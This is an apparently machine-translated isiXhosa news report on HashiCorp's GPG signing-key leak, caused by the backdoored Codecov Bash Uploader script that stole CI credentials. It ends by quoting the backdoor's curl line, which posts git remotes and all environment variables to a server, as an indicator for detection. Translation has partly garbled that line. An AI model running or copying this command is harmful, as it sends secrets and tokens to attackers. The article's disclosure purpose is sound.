I-HashiCorp, eyaziwayo ngokuphuhlisa izixhobo ezivulekileyo ze-Vagrant, i-Packer, i-Nomad kunye ne-Terraform, ibhengeze ukuvuza kweqhosha le-GPG labucala elisetyenziselwa ukwenza iisignesha zedijithali eziqinisekisa ukukhutshwa. Abahlaseli abafumene ukufikelela kwi-key ye-GPG banokukwazi ukwenza utshintsho olufihliweyo kwiimveliso ze-HashiCorp ngokuziqinisekisa ngesignesha echanekileyo yedijithali. Kwangaxeshanye, inkampani yathi ngexesha lophicotho-zincwadi, akukho mkhondo wamalinge okwenza olo hlengahlengiso ichongiwe.
Okwangoku, isitshixo se-GPG esincitshisiweyo sirhoxisiwe kwaye isitshixo esitsha siye saziswa endaweni yaso. Ingxaki ichaphazele kuphela ukuqinisekiswa kusetyenziswa i-SHA256SUM kunye neefayile ze-SHA256SUM.sig, kwaye ayizange ichaphazele ukuveliswa kweesignesha zedijithali zeLinux DEB kunye neepakethe zeRPM ezinikezelwe ngokukhutshwa.hashicorp.com, kunye neendlela zokuqinisekisa zokukhupha ze-macOS kunye neWindows (AuthentiCode) .
Ukuvuza kwenzeke ngenxa yokusetyenziswa kweskripthi se-Codecov Bash Uploader (i-codecov-bash) kwiziseko ezingundoqo, eyilelwe ukukhuphela iingxelo zokhuselo kwiinkqubo eziqhubekayo zokuhlanganisa. Ngethuba lokuhlaselwa kwenkampani yeCodecov, i-backdoor yayifihliwe kwiskripthi esichaziweyo, apho iiphasiwedi kunye nezitshixo zokubethela zathunyelwa kumncedisi wabahlaseli.
Ukukhwabanisa, abahlaseli basebenzise impazamo kwinkqubo yokudala umfanekiso weCodecov Docker, owabavumela ukuba bakhuphe idatha yokufikelela kwi-GCS (i-Google Cloud Storage), efunekayo ukwenza utshintsho kwiskripthi soMlayishi weBash esasasazwa kwi-codecov.io iwebhusayithi. Utshintsho lwenziwe emva kwe-31 kaJanuwari, lwahlala lungabonakali kwiinyanga ezimbini kwaye luvumela abahlaseli ukuba bakhuphe ulwazi olugcinwe kwiindawo eziqhubekayo zokudibanisa umthengi. Ukusebenzisa ikhowudi ekhohlakeleyo eyongeziweyo, abahlaseli banokufumana ulwazi malunga ne-Git repository evavanyiweyo kunye nazo zonke izinto eziguquguqukayo zokusingqongileyo, kubandakanywa amathokheni, izitshixo ze-encryption kunye neephasiwedi ezithunyelwa kwiinkqubo eziqhubekayo zokuhlanganisa ukulungiselela ukufikelela kwikhowudi yesicelo, iindawo zokugcina kunye neenkonzo ezifana ne-Amazon Web Services kunye ne-GitHub.
Ukongeza kwifowuni ngokuthe ngqo, i-Codecov Bash Uploader script isetyenziswe njengenxalenye yabanye abalayishi, njenge-Codecov-action (Github), i-Codecov-circleci-orb kunye ne-Codecov-bitrise-step, abasebenzisi bayo abachaphazelekayo nengxaki. Bonke abasebenzisi be-codecov-bash kunye neemveliso ezinxulumene nazo bayacetyiswa ukuba baphicothe iziseko zabo, kunye nokutshintsha amagama ayimfihlo kunye nezitshixo zokubethela. Unokujonga ubukho be-backdoor kwiscript ngobukho be-curl yomgca -sm 0.5 -d "$(git remote -v)<<<<<< ENV $(env)" http:// /layisha/v2 | yinyani
umthombo: opennet.ru